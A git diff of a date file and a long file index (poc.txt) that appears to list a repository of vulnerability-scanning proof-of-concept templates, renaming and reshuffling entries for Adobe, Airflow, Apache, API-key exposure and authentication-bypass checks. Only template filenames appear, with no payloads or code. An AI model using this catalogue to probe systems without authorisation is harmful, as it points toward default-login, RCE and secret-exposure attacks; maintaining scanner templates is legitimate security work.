diff --git a/date.txt b/date.txt index 73da64a4ae..0285004731 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240509 +20240510 diff --git a/poc.txt b/poc.txt index 01c0d19c56..8ee82053b1 100644 --- a/poc.txt +++ b/poc.txt @@ -49,15 +49,15 @@ ./poc/adobe/adobe-connect-username-exposure-98.yaml ./poc/adobe/adobe-connect-username-exposure-99.yaml ./poc/adobe/adobe-connect-username-exposure.yaml +./poc/adobe/adobe-connect-version-102.yaml ./poc/adobe/adobe-connect-version-103.yaml -./poc/adobe/adobe-connect-version.yaml ./poc/adobe/adobe-connect.yaml ./poc/adobe/adobe-cq5.yaml ./poc/adobe/adobe-experience-manager-login-105.yaml -./poc/adobe/adobe-experience-manager-login-106.yaml ./poc/adobe/adobe-experience-manager-login-107.yaml ./poc/adobe/adobe-experience-manager-login-108.yaml ./poc/adobe/adobe-experience-manager-login-109.yaml +./poc/adobe/adobe-experience-manager-login.yaml ./poc/adobe/adobe-experience-manager.yaml ./poc/adobe/adobe-flex.yaml ./poc/adobe/adobe-golive.yaml @@ -101,7 +101,6 @@ ./poc/adobe/aem-default-get-servlet-135.yaml ./poc/adobe/aem-default-get-servlet-136.yaml ./poc/adobe/aem-default-get-servlet-137.yaml -./poc/adobe/aem-default-get-servlet-138.yaml ./poc/adobe/aem-default-get-servlet-139.yaml ./poc/adobe/aem-default-get-servlet-14.yaml ./poc/adobe/aem-default-get-servlet-15.yaml @@ -154,6 +153,7 @@ ./poc/adobe/aem-default-get-servlet-7.yaml ./poc/adobe/aem-default-get-servlet-8.yaml ./poc/adobe/aem-default-get-servlet-9.yaml +./poc/adobe/aem-default-get-servlet.yaml ./poc/adobe/aem-default-login-140.yaml ./poc/adobe/aem-default-login-141.yaml ./poc/adobe/aem-default-login-142.yaml @@ -162,7 +162,7 @@ ./poc/adobe/aem-detection-143.yaml ./poc/adobe/aem-detection-144.yaml ./poc/adobe/aem-detection-145.yaml -./poc/adobe/aem-detection-146.yaml +./poc/adobe/aem-detection.yaml ./poc/adobe/aem-external-link-checker.yaml ./poc/adobe/aem-felix-console.yaml ./poc/adobe/aem-fuzz.yaml @@ -182,16 +182,16 @@ ./poc/adobe/aem-hash-querybuilder-159.yaml ./poc/adobe/aem-hash-querybuilder-160.yaml ./poc/adobe/aem-hash-querybuilder.yaml +./poc/adobe/aem-jcr-querybuilder-162.yaml ./poc/adobe/aem-jcr-querybuilder-163.yaml ./poc/adobe/aem-jcr-querybuilder-164.yaml ./poc/adobe/aem-jcr-querybuilder-165.yaml -./poc/adobe/aem-jcr-querybuilder.yaml ./poc/adobe/aem-list-custom.yaml ./poc/adobe/aem-login-status-167.yaml ./poc/adobe/aem-login-status-168.yaml ./poc/adobe/aem-login-status-169.yaml ./poc/adobe/aem-login-status-170.yaml -./poc/adobe/aem-login-status-171.yaml +./poc/adobe/aem-login-status.yaml ./poc/adobe/aem-merge-metadata-servlet-172.yaml ./poc/adobe/aem-merge-metadata-servlet-173.yaml ./poc/adobe/aem-merge-metadata-servlet-174.yaml @@ -213,8 +213,8 @@ ./poc/adobe/aem-querybuilder-json-servlet-183.yaml ./poc/adobe/aem-querybuilder-json-servlet-184.yaml ./poc/adobe/aem-querybuilder-json-servlet-185.yaml +./poc/adobe/aem-querybuilder-json-servlet-186.yaml ./poc/adobe/aem-querybuilder-json-servlet-187.yaml -./poc/adobe/aem-querybuilder-json-servlet.yaml ./poc/adobe/aem-secrets.yaml ./poc/adobe/aem-setpreferences-xss-188.yaml ./poc/adobe/aem-setpreferences-xss-189.yaml @@ -242,7 +242,6 @@ ./poc/adobe/possible-AEM-secrets.yaml ./poc/adobe/servudaemon-ini.yaml ./poc/airflow/Airflow-Unauth.yaml -./poc/airflow/Airflow-unauthorized.yaml ./poc/airflow/airflow-api-exposure.yaml ./poc/airflow/airflow-configuration-exposure-229.yaml ./poc/airflow/airflow-configuration-exposure-230.yaml @@ -262,11 +261,12 @@ ./poc/airflow/airflow-detect.yaml ./poc/airflow/airflow-exposure.yaml ./poc/airflow/airflow-panel-241.yaml +./poc/airflow/airflow-panel-242.yaml ./poc/airflow/airflow-panel-243.yaml ./poc/airflow/airflow-panel-244.yaml ./poc/airflow/airflow-panel-245.yaml -./poc/airflow/airflow-panel.yaml ./poc/airflow/airflow-unauth.yml +./poc/airflow/airflow-unauthorized.yaml ./poc/airflow/airflow-workflow.yaml ./poc/airflow/apache-airflow.yaml ./poc/airflow/unauthenticated-airflow-10884.yaml @@ -292,8 +292,8 @@ ./poc/apache/apache-ambari.yaml ./poc/apache/apache-apisix-dashboard.yaml ./poc/apache/apache-apisix-panel-336.yaml -./poc/apache/apache-apisix-panel-337.yaml ./poc/apache/apache-apisix-panel-338.yaml +./poc/apache/apache-apisix-panel.yaml ./poc/apache/apache-apisix.yaml ./poc/apache/apache-archiva.yaml ./poc/apache/apache-axis-detect-1.yaml @@ -327,7 +327,7 @@ ./poc/apache/apache-druid-unauth-350.yaml ./poc/apache/apache-druid-unauth.yaml ./poc/apache/apache-druid.yaml -./poc/apache/apache-dubbo-detect-351.yaml +./poc/apache/apache-dubbo-detect.yaml ./poc/apache/apache-dubbo-unauth.yaml ./poc/apache/apache-dubbo.yaml ./poc/apache/apache-filename-brute-force-352.yaml @@ -345,7 +345,7 @@ ./poc/apache/apache-flink.yaml ./poc/apache/apache-forrest.yaml ./poc/apache/apache-guacamole-360.yaml -./poc/apache/apache-guacamole-361.yaml +./poc/apache/apache-guacamole.yaml ./poc/apache/apache-hadoop-yarn.yaml ./poc/apache/apache-hadoop.yaml ./poc/apache/apache-haus.yaml @@ -393,7 +393,7 @@ ./poc/apache/apache-solr-file-read-370.yaml ./poc/apache/apache-solr-file-read-371.yaml ./poc/apache/apache-solr-file-read.yaml -./poc/apache/apache-solr-log4j-cve-2021-44228.yaml +./poc/apache/apache-solr-log4j-CVE-2021-44228.yaml ./poc/apache/apache-solr-log4j-rce-372.yaml ./poc/apache/apache-solr-log4j-rce.yaml ./poc/apache/apache-solr-rce.yaml @@ -434,9 +434,9 @@ ./poc/apache/apachesolrlfissrf.yaml ./poc/apache/apachestruts-rce.yaml ./poc/apache/default-apache-test-all-6812.yaml -./poc/apache/default-apache-test-all-6813.yaml ./poc/apache/default-apache-test-all-6814.yaml ./poc/apache/default-apache-test-all-6815.yaml +./poc/apache/default-apache-test-all.yaml ./poc/apache/default-apache-test-page-6817.yaml ./poc/apache/default-apache-test-page-6818.yaml ./poc/apache/default-apache-test-page-6819.yaml @@ -446,10 +446,10 @@ ./poc/apache/default-apache2-page-6806.yaml ./poc/apache/default-apache2-page-6807.yaml ./poc/apache/default-apache2-page.yaml +./poc/apache/default-apache2-ubuntu-page-6808.yaml ./poc/apache/default-apache2-ubuntu-page-6809.yaml ./poc/apache/default-apache2-ubuntu-page-6810.yaml ./poc/apache/default-apache2-ubuntu-page-6811.yaml -./poc/apache/default-apache2-ubuntu-page.yaml ./poc/apache/unauth-apache-kafka-ui.yaml ./poc/api/API-Linkfinder.yaml ./poc/api/ApacheNifi-Api-UnauthorizedAccess.yaml @@ -479,8 +479,8 @@ ./poc/api/algolia-api-key.yaml ./poc/api/apache-apisix-dashboard.yaml ./poc/api/apache-apisix-panel-336.yaml -./poc/api/apache-apisix-panel-337.yaml ./poc/api/apache-apisix-panel-338.yaml +./poc/api/apache-apisix-panel.yaml ./poc/api/apache-apisix.yaml ./poc/api/apache-nifi-api-unauthorized-access.yml ./poc/api/api-1forge.yaml @@ -512,7 +512,7 @@ ./poc/api/api-aletheia.yaml ./poc/api/api-alienvault-388.yaml ./poc/api/api-alienvault-389.yaml -./poc/api/api-alienvault.yaml +./poc/api/api-alienvault-390.yaml ./poc/api/api-amdoren.yaml ./poc/api/api-aniapi.yaml ./poc/api/api-api2convert.yaml @@ -608,8 +608,8 @@ ./poc/api/api-exchangerateapi.yaml ./poc/api/api-facebook-422.yaml ./poc/api/api-facebook.yaml -./poc/api/api-fastly-423.yaml ./poc/api/api-fastly-424.yaml +./poc/api/api-fastly.yml ./poc/api/api-festivo-425.yaml ./poc/api/api-festivo.yaml ./poc/api/api-fixer.yaml @@ -624,8 +624,8 @@ ./poc/api/api-giphy.yaml ./poc/api/api-github-429.yaml ./poc/api/api-github.yaml -./poc/api/api-gitlab-430.yaml ./poc/api/api-gitlab-431.yaml +./poc/api/api-gitlab.yml ./poc/api/api-gofile.yaml ./poc/api/api-google-drive-432.yaml ./poc/api/api-google-drive.yaml @@ -857,7 +857,7 @@ ./poc/api/apiman-panel-461.yaml ./poc/api/apiman-panel-462.yaml ./poc/api/apiman-panel-463.yaml -./poc/api/apiman-panel-464.yaml +./poc/api/apiman-panel.yaml ./poc/api/apisix-default-login-490.yaml ./poc/api/apisix-default-login-491.yaml ./poc/api/apisix-default-login-492.yaml @@ -893,7 +893,7 @@ ./poc/api/couchbase-buckets-api-1230.yaml ./poc/api/couchbase-buckets-api-1231.yaml ./poc/api/couchbase-buckets-api-1232.yaml -./poc/api/couchbase-buckets-api-1233.yaml +./poc/api/couchbase-buckets-api.yaml ./poc/api/couchbase-buckets-rest-api.yaml ./poc/api/cpanel-api-codes.yaml ./poc/api/crates-api-key.yaml @@ -929,7 +929,7 @@ ./poc/api/exposed-docker-api-1.yaml ./poc/api/exposed-docker-api-2.yaml ./poc/api/exposed-docker-api-7299.yaml -./poc/api/exposed-docker-api-7300.yaml +./poc/api/exposed-docker-api.yaml ./poc/api/exposed-glances-api-7308.yaml ./poc/api/exposed-glances-api-7309.yaml ./poc/api/exposed-glances-api-7310.yaml @@ -1018,7 +1018,6 @@ ./poc/api/magento-2-exposed-api-8688.yaml ./poc/api/magento-2-exposed-api-8689.yaml ./poc/api/magento-2-exposed-api.yaml -./poc/api/mailchimp-api(1).yaml ./poc/api/mailchimp-api-11854.yaml ./poc/api/mailchimp-api-key-8722.yaml ./poc/api/mailchimp-api-key-8723.yaml @@ -1026,6 +1025,7 @@ ./poc/api/mailchimp-api-key-8725.yaml ./poc/api/mailchimp-api-key-8726.yaml ./poc/api/mailchimp-api-key.yaml +./poc/api/mailchimp-api.yaml ./poc/api/mailgun-api-11855.yaml ./poc/api/mailgun-api-token.yaml ./poc/api/mailgun-api.yaml @@ -1104,8 +1104,8 @@ ./poc/api/strapi-page.yaml ./poc/api/strapi-panel-10548.yaml ./poc/api/strapi-panel.yaml +./poc/api/stripe-api-key(1).yaml ./poc/api/stripe-api-key-11869.yaml -./poc/api/stripe-api-key.yaml ./poc/api/swagger-api-1.yaml ./poc/api/swagger-api-10.yaml ./poc/api/swagger-api-10591.yaml @@ -1279,10 +1279,10 @@ ./poc/atlassian/confluence-detect-1186.yaml ./poc/atlassian/confluence-detect-1187.yaml ./poc/atlassian/confluence-detect-1188.yaml -./poc/atlassian/confluence-detect-1189.yaml ./poc/atlassian/confluence-detect-2.yaml ./poc/atlassian/confluence-detect-3.yaml ./poc/atlassian/confluence-detect-4.yaml +./poc/atlassian/confluence-detect.yaml ./poc/atlassian/confluence-oauth-admin.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1190.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1191.yaml @@ -1350,7 +1350,7 @@ ./poc/atlassian/jira-unauthenticated-user-picker.yaml ./poc/atlassian/jira-unauthenticated.yaml ./poc/atlassian/jira-workflow.yaml -./poc/atlassian/jira_user_piker.yaml +./poc/atlassian/jira_user_piker (copy 1).yaml ./poc/atlassian/jirausername.yaml ./poc/atlassian/poc-yaml-Confluence-ognl-rce.yaml ./poc/auth/1password-phish.yaml @@ -1358,7 +1358,6 @@ ./poc/auth/74cms_v4-register-sqli.yaml ./poc/auth/AVTECH-login-bypass.yaml ./poc/auth/Airflow-Unauth.yaml -./poc/auth/Airflow-unauthorized.yaml ./poc/auth/Amazon-mws-auth-token.yaml ./poc/auth/Apache-solr-unauth.yaml ./poc/auth/ApacheNifi-Api-UnauthorizedAccess.yaml @@ -1382,7 +1381,9 @@ ./poc/auth/Fangwei-OA-AdminLogin.yaml ./poc/auth/GT-AC2900-login.yaml ./poc/auth/Gemalto-Sentinel-ACC-Unauthorized-Access.yaml +./poc/auth/Gogs-unauth.yaml ./poc/auth/Grafana-Auth.yaml +./poc/auth/H3C-SECPATH-loginBypass.yaml ./poc/auth/HIKVISION-iVms-read-download.token.yaml ./poc/auth/HIKVISION-iVms-upload-upload.token.yaml ./poc/auth/HTTP - Cookies.yaml @@ -1390,9 +1391,9 @@ ./poc/auth/IBM-Signup-Exposure.yaml ./poc/auth/JCMS-Que_Model_JSP-Unauth.yaml ./poc/auth/Jcms-Ldap-SecretKeyLeak.yaml -./poc/auth/JeeSite-default-login.yaml ./poc/auth/Jupyter-Notebook-Unauthorized-Access-Rce.yaml ./poc/auth/Keycloak-xss.yaml +./poc/auth/Kingsoft-default-login.yaml ./poc/auth/Konga-default-login.yaml ./poc/auth/Kubernetes-unauth.yaml ./poc/auth/Kyan_design_account_password_disclosure.yaml @@ -1503,10 +1504,10 @@ ./poc/auth/adobe-connect-central-login-96.yaml ./poc/auth/adobe-connect-central-login-97.yaml ./poc/auth/adobe-experience-manager-login-105.yaml -./poc/auth/adobe-experience-manager-login-106.yaml ./poc/auth/adobe-experience-manager-login-107.yaml ./poc/auth/adobe-experience-manager-login-108.yaml ./poc/auth/adobe-experience-manager-login-109.yaml +./poc/auth/adobe-experience-manager-login.yaml ./poc/auth/adobe-oauth-secret.yaml ./poc/auth/adobe-secret.yaml ./poc/auth/aem-default-login-140.yaml @@ -1516,7 +1517,7 @@ ./poc/auth/aem-login-status-168.yaml ./poc/auth/aem-login-status-169.yaml ./poc/auth/aem-login-status-170.yaml -./poc/auth/aem-login-status-171.yaml +./poc/auth/aem-login-status.yaml ./poc/auth/aem-secrets.yaml ./poc/auth/aem-sling-login.yaml ./poc/auth/afterlogic-webmail-login.yaml @@ -1525,13 +1526,13 @@ ./poc/auth/aic-intelligent-campus-system-password-leak.yaml ./poc/auth/aic-intelligent-password-leak.yaml ./poc/auth/aims-password-mgmt-client-218.yaml -./poc/auth/aims-password-mgmt-client-219.yaml ./poc/auth/aims-password-mgmt-client-220.yaml ./poc/auth/aims-password-mgmt-client-221.yaml +./poc/auth/aims-password-mgmt-client.yaml ./poc/auth/aims-password-portal-222.yaml ./poc/auth/aims-password-portal-223.yaml ./poc/auth/aims-password-portal-224.yaml -./poc/auth/aims-password-portal-225.yaml +./poc/auth/aims-password-portal.yaml ./poc/auth/aircube-login.yaml ./poc/auth/airflow-default-credentials.yaml ./poc/auth/airflow-default-login-234.yaml @@ -1539,6 +1540,7 @@ ./poc/auth/airflow-default-login-236.yaml ./poc/auth/airflow-default-login.yaml ./poc/auth/airflow-unauth.yml +./poc/auth/airflow-unauthorized.yaml ./poc/auth/airtable-api-key.yaml ./poc/auth/airtable-key.yaml ./poc/auth/algolia-api-key.yaml @@ -1550,7 +1552,7 @@ ./poc/auth/alibaba-key-id.yaml ./poc/auth/alibaba-mongoshake-unauth-268.yaml ./poc/auth/alibaba-mongoshake-unauth-269.yaml -./poc/auth/alibaba-mongoshake-unauth.yaml +./poc/auth/alibaba-mongoshake-unauth-270.yaml ./poc/auth/alibaba-nacos-v1-auth-bypass.yml ./poc/auth/alibaba-secretkey-id.yaml ./poc/auth/alphaweb-default-login-275.yaml @@ -1632,7 +1634,7 @@ ./poc/auth/arcgis-tokens.yaml ./poc/auth/argocd-login-534.yaml ./poc/auth/argocd-login-535.yaml -./poc/auth/argocd-login.yaml +./poc/auth/argocd-login-536.yaml ./poc/auth/arl-default-login-537.yaml ./poc/auth/arl-default-login-538.yaml ./poc/auth/arl-default-login-539.yaml @@ -1762,7 +1764,7 @@ ./poc/auth/bomgar-login-panel.yaml ./poc/auth/braintree-access-token-771.yaml ./poc/auth/braintree-access-token-772.yaml -./poc/auth/braintree-access-token.yaml +./poc/auth/braintree-access-token-773.yaml ./poc/auth/branch-key-774.yaml ./poc/auth/branch-key-775.yaml ./poc/auth/brother-unauthorized-access-791.yaml @@ -1778,7 +1780,7 @@ ./poc/auth/businessintelligence-default-login.yaml ./poc/auth/camunda-login-panel-1.yaml ./poc/auth/camunda-login-panel-2.yaml -./poc/auth/camunda-login-panel-845.yaml +./poc/auth/camunda-login-panel.yaml ./poc/auth/canal-default-login-846.yaml ./poc/auth/canal-default-login-847.yaml ./poc/auth/canal-default-login-848.yaml @@ -1788,7 +1790,7 @@ ./poc/auth/captchinoo-captcha-for-login-form-protection-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/captchinoo-captcha-for-login-form-protection-db9bc46086a49298b34fb1c53b7770b8.yaml ./poc/auth/captchinoo-captcha-for-login-form-protection-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml -./poc/auth/cas-login.yaml +./poc/auth/cas-login-870.yaml ./poc/auth/casbin-get-users-account-password-disclosure.yaml ./poc/auth/casdoor-login.yaml ./poc/auth/casso-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -1821,9 +1823,9 @@ ./poc/auth/cisco-integrated-login-942.yaml ./poc/auth/cisco-integrated-login-943.yaml ./poc/auth/cisco-integrated-login.yaml -./poc/auth/cisco-systems-login-973.yaml ./poc/auth/cisco-systems-login-974.yaml ./poc/auth/cisco-systems-login-975.yaml +./poc/auth/cisco-systems-login.yaml ./poc/auth/cisco-ucs-kvm-login-980.yaml ./poc/auth/cisco-ucs-kvm-login.yaml ./poc/auth/cisco-vmanage-login.yaml @@ -1866,7 +1868,7 @@ ./poc/auth/coldfusion-administrator-login-1144.yaml ./poc/auth/coldfusion-administrator-login-1145.yaml ./poc/auth/coldfusion-administrator-login-1146.yaml -./poc/auth/coldfusion-administrator-login-1147.yaml +./poc/auth/coldfusion-administrator-login.yaml ./poc/auth/coldfusion-lucee-auth-bypass.yaml ./poc/auth/comai-ras-cookie-bypass.yaml ./poc/auth/commax-biometric-auth-bypass-1156.yaml @@ -1994,14 +1996,14 @@ ./poc/auth/dell-idrac9-default-login-6931.yaml ./poc/auth/dell-idrac9-default-login-6932.yaml ./poc/auth/dell-idrac9-default-login-6933.yaml -./poc/auth/dell-idrac9-default-login-6934.yaml ./poc/auth/dell-idrac9-default-login-6935.yaml +./poc/auth/dell-idrac9-default-login.yaml ./poc/auth/dell-idrac9-default-password.yaml ./poc/auth/dell-openmanager-login-1.yaml ./poc/auth/dell-openmanager-login-2.yaml -./poc/auth/dell-openmanager-login-6948.yaml ./poc/auth/dell-openmanager-login-6949.yaml ./poc/auth/dell-openmanager-login-6950.yaml +./poc/auth/dell-openmanager-login-6951.yaml ./poc/auth/dell-openmanager-login.yaml ./poc/auth/dell-remote-power-management-default-login.yaml ./poc/auth/dell-wyse-login-6952.yaml @@ -2172,7 +2174,8 @@ ./poc/auth/facebook-access-token.yaml ./poc/auth/facebook-api-token.yaml ./poc/auth/facebook-secret-11849.yaml -./poc/auth/facebook-secret.yaml +./poc/auth/facebook-secret-7386.yaml +./poc/auth/facebook-secrets.yaml ./poc/auth/fake-auth-bypass.yaml ./poc/auth/fake-auth-header-auth-bypass.yaml ./poc/auth/fake-referer-header-auth-bypass.yaml @@ -2314,8 +2317,8 @@ ./poc/auth/gmail-api-client-secrets-7740.yaml ./poc/auth/gmail-api-client-secrets.yaml ./poc/auth/goanywhere-mft-login.yaml +./poc/auth/gocd-encryption-key-7749.yaml ./poc/auth/gocd-encryption-key-7750.yaml -./poc/auth/gocd-encryption-key.yaml ./poc/auth/gocd-login-7751.yaml ./poc/auth/gocd-login-7752.yaml ./poc/auth/gocd-login-7753.yaml @@ -2323,7 +2326,6 @@ ./poc/auth/gocd-unauth-dashboard-7754.yaml ./poc/auth/gocd-unauth-dashboard.yaml ./poc/auth/gogs-login-7759.yaml -./poc/auth/gogs-unauth.yaml ./poc/auth/goip-default-login.yaml ./poc/auth/google-api-key-7766.yaml ./poc/auth/google-api-key-7767.yaml @@ -2341,13 +2343,12 @@ ./poc/auth/google-earth-dlogin.yaml ./poc/auth/google-earthenterprise-weak-password.yaml ./poc/auth/google-oauth-prefixed.yaml -./poc/auth/google-secrets.yaml ./poc/auth/google-seo-author-snippets-c7ef7a54325272053bde6fd4c9883ada.yaml ./poc/auth/google-seo-author-snippets-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/google-seo-author-snippets-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/gophish-default-login-7792.yaml ./poc/auth/gophish-default-login-7793.yaml -./poc/auth/gophish-default-login-7794.yaml +./poc/auth/gophish-default-login.yaml ./poc/auth/gophish-login-7795.yaml ./poc/auth/gophish-login-7796.yaml ./poc/auth/gophish-login.yaml @@ -2373,7 +2374,7 @@ ./poc/auth/graphicssocial-mastodon-instance.yaml ./poc/auth/graphite-browser-default-credential.yaml ./poc/auth/gryphon-login.yaml -./poc/auth/gt-ac2900-login(1).yaml +./poc/auth/gt-ac2900-login.yaml ./poc/auth/guacamole-default-login-7858.yaml ./poc/auth/guacamole-default-login-7859.yaml ./poc/auth/guacamole-default-login-7860.yaml @@ -2383,7 +2384,6 @@ ./poc/auth/h2-database-web-console-unauthorized-access.yml ./poc/auth/h2console-unauth.yaml ./poc/auth/h3c-secparh-any-user-login.yml -./poc/auth/h3c-secpath-loginbypass.yaml ./poc/auth/h5s-video-platform-cnvd-2020-67113-unauth.yaml ./poc/auth/h5s-video-platform-cnvd-2020-67113-unauth.yml ./poc/auth/h5s-video-unauth.yaml @@ -2531,6 +2531,7 @@ ./poc/auth/jboss-default-password.yaml ./poc/auth/jboss-jbpm-default-login.yaml ./poc/auth/jboss-unauth.yml +./poc/auth/jeesite-default-login.yaml ./poc/auth/jellyseerr-login-panel.yaml ./poc/auth/jenkins-credentials-disclosure.yml ./poc/auth/jenkins-crumb-token.yaml @@ -2684,7 +2685,6 @@ ./poc/auth/kfm-login-panel.yaml ./poc/auth/kibana-unauth.yml ./poc/auth/kingdee-erp-getbusinessobjectdata-rce.yaml -./poc/auth/kingsoft-default-login.yaml ./poc/auth/kingsoft-v8-default-login.yaml ./poc/auth/kingsoft-v8-default-password.yml ./poc/auth/kiwitcms-login-8496.yaml @@ -2760,7 +2760,7 @@ ./poc/auth/loginpress-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/loginpress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/loginpress.yaml -./poc/auth/logins.yaml +./poc/auth/logins (copy 1).yaml ./poc/auth/lucee-login-1.yaml ./poc/auth/lucee-login-2.yaml ./poc/auth/lucee-login-8662.yaml @@ -2847,7 +2847,6 @@ ./poc/auth/miniorange-login-with-whmcs-348c85cfdc1c991a494bacc3314a9b4f.yaml ./poc/auth/miniorange-login-with-whmcs-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/miniorange-login-with-whmcs-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml -./poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml ./poc/auth/missing-authorization-simply-gallery-block.yaml ./poc/auth/mkey.yaml ./poc/auth/mlflow-unauth.yaml @@ -2863,7 +2862,7 @@ ./poc/auth/mobotix-default-login.yaml ./poc/auth/mofi4500-default-login-8912.yaml ./poc/auth/mofi4500-default-login-8913.yaml -./poc/auth/mofi4500-default-login.yaml +./poc/auth/mofi4500-default-login-8914.yaml ./poc/auth/mofi4500-default-password.yaml ./poc/auth/mongodb-unauth-8925.yaml ./poc/auth/mongodb-unauth-8926.yaml @@ -2945,7 +2944,7 @@ ./poc/auth/nexus-default-login-9086.yaml ./poc/auth/nexus-default-login-9087.yaml ./poc/auth/nexus-default-login-9088.yaml -./poc/auth/nexus-default-login.yaml +./poc/auth/nexus-default-login-9089.yaml ./poc/auth/nexus-default-password-9091.yaml ./poc/auth/nexus-default-password.yaml ./poc/auth/nexus-default-password.yml @@ -3089,8 +3088,8 @@ ./poc/auth/password-protected.yaml ./poc/auth/passwords-manager-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/passwords-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml -./poc/auth/paypal-braintree-token(1).yaml ./poc/auth/paypal-braintree-token-11856.yaml +./poc/auth/paypal-braintree-token.yaml ./poc/auth/pentaho-cve-2021-31602-authentication-bypass.yaml ./poc/auth/pentaho-cve-2021-31602-authentication-bypass.yml ./poc/auth/pentaho-default-login-9477.yaml @@ -3209,7 +3208,7 @@ ./poc/auth/rainloop-default-login.yaml ./poc/auth/rancher-default-login-9814.yaml ./poc/auth/rancher-default-login-9815.yaml -./poc/auth/rancher-default-login.yaml +./poc/auth/rancher-default-login-9816.yaml ./poc/auth/rancher-default-password.yaml ./poc/auth/ranger-default-login-9827.yaml ./poc/auth/ranger-default-login-9828.yaml @@ -3256,7 +3255,7 @@ ./poc/auth/rockmongo-default-login-9897.yaml ./poc/auth/rockmongo-default-login-9898.yaml ./poc/auth/rockmongo-default-login-9899.yaml -./poc/auth/rockmongo-default-login.yaml +./poc/auth/rockmongo-default-login-9900.yaml ./poc/auth/rockmongo-default-password.yml ./poc/auth/routeros-login-9908.yaml ./poc/auth/routeros-login-9909.yaml @@ -3446,11 +3445,11 @@ ./poc/auth/shopify-private-token-11861.yaml ./poc/auth/shopify-private-token.yaml ./poc/auth/shopify-public-token.yaml +./poc/auth/shopify-shared-secret(1).yaml ./poc/auth/shopify-shared-secret-10200.yaml -./poc/auth/shopify-shared-secret-11862.yaml ./poc/auth/shopify-shared-secret.yaml +./poc/auth/shopify-token(1).yaml ./poc/auth/shopify-token-10205.yaml -./poc/auth/shopify-token-11863.yaml ./poc/auth/shopify-token.yaml ./poc/auth/shoppable-token-10206.yaml ./poc/auth/shoppable-token-10207.yaml @@ -3477,7 +3476,7 @@ ./poc/auth/sitefinity-login-10296.yaml ./poc/auth/sitefinity-login-10297.yaml ./poc/auth/sitefinity-login-10298.yaml -./poc/auth/sitefinity-login.yaml +./poc/auth/sitefinity-login-10299.yaml ./poc/auth/siteomat-login-10300.yaml ./poc/auth/siteomat-login-10301.yaml ./poc/auth/siteomat-login-10302.yaml @@ -3503,7 +3502,7 @@ ./poc/auth/smartsense-default-login-10328.yaml ./poc/auth/smartsense-default-login-10329.yaml ./poc/auth/smartsense-default-login-10330.yaml -./poc/auth/smartsense-default-login.yaml +./poc/auth/smartsense-default-login-10331.yaml ./poc/auth/snow-monkey-forms-b870dfd4deccc70c5aa8363616a97294.yaml ./poc/auth/solar-log-authbypass-10352.yaml ./poc/auth/solar-log-authbypass-10353.yaml @@ -3511,8 +3510,8 @@ ./poc/auth/solarwinds-default-login-1.yaml ./poc/auth/solarwinds-default-login-10354.yaml ./poc/auth/solarwinds-default-login-10355.yaml +./poc/auth/solarwinds-default-login-10356.yaml ./poc/auth/solarwinds-default-login-2.yaml -./poc/auth/solarwinds-default-login.yaml ./poc/auth/somfy-login-10371.yaml ./poc/auth/somfy-login-10372.yaml ./poc/auth/somfy-login-10373.yaml @@ -3601,8 +3600,8 @@ ./poc/auth/steve-login-panel.yaml ./poc/auth/stonerssocial-mastodon-instance.yaml ./poc/auth/storm-unauthorized-access.yaml +./poc/auth/stripe-api-key(1).yaml ./poc/auth/stripe-api-key-11869.yaml -./poc/auth/stripe-api-key.yaml ./poc/auth/stripe-restricted-key-10553.yaml ./poc/auth/stripe-restricted-key-10554.yaml ./poc/auth/stripe-restricted-key-10555.yaml @@ -3612,8 +3611,8 @@ ./poc/auth/stripe-secret-key-10558.yaml ./poc/auth/stripe-secret-key.yaml ./poc/auth/structurizr-default-login.yaml +./poc/auth/submitty-login-10567.yaml ./poc/auth/submitty-login-10568.yaml -./poc/auth/submitty-login.yaml ./poc/auth/subrion-login.yaml ./poc/auth/sunlogin.yaml ./poc/auth/sunlogin_RCE_CNVD-2022-10270.yaml @@ -3722,14 +3721,14 @@ ./poc/auth/trilithic-viewpoint-login-10837.yaml ./poc/auth/trilithic-viewpoint-login-10838.yaml ./poc/auth/trilithic-viewpoint-login-10839.yaml -./poc/auth/trilithic-viewpoint-login.yaml +./poc/auth/trilithic-viewpoint-login-10840.yaml ./poc/auth/trunkey-icpsystem.yaml ./poc/auth/tufin-securetrack-login.yaml ./poc/auth/turnkey-openvpn.yaml ./poc/auth/twilio-api-key.yaml +./poc/auth/twitter-secret(1).yaml ./poc/auth/twitter-secret-10862.yaml ./poc/auth/twitter-secret-11870.yaml -./poc/auth/twitter-secret.yaml ./poc/auth/tyan-megarac-sp-default-login.yaml ./poc/auth/tyan-rmm-bmc-default-login.yaml ./poc/auth/typo3-login.yaml @@ -3832,7 +3831,7 @@ ./poc/auth/unauthenticated-popup-upload-10920.yaml ./poc/auth/unauthenticated-popup-upload-10921.yaml ./poc/auth/unauthenticated-popup-upload-10922.yaml -./poc/auth/unauthenticated-popup-upload.yaml +./poc/auth/unauthenticated-popup-upload-10923.yaml ./poc/auth/unauthenticated-prtg-10924.yaml ./poc/auth/unauthenticated-prtg-10925.yaml ./poc/auth/unauthenticated-prtg-10926.yaml @@ -3873,6 +3872,7 @@ ./poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml ./poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml ./poc/auth/unauthorized-puppet-node-manager-detect.yaml +./poc/auth/unencrypted-bigip-ltm-cookie-10972.yaml ./poc/auth/unencrypted-bigip-ltm-cookie-10973.yaml ./poc/auth/unencrypted-bigip-ltm-cookie.yaml ./poc/auth/untangle-admin-login.yaml @@ -3883,7 +3883,7 @@ ./poc/auth/vcenter-weak-password-policy.yaml ./poc/auth/versa-default-login-11002.yaml ./poc/auth/versa-default-login-11003.yaml -./poc/auth/versa-default-login.yaml +./poc/auth/versa-default-login-11004.yaml ./poc/auth/versa-default-password.yaml 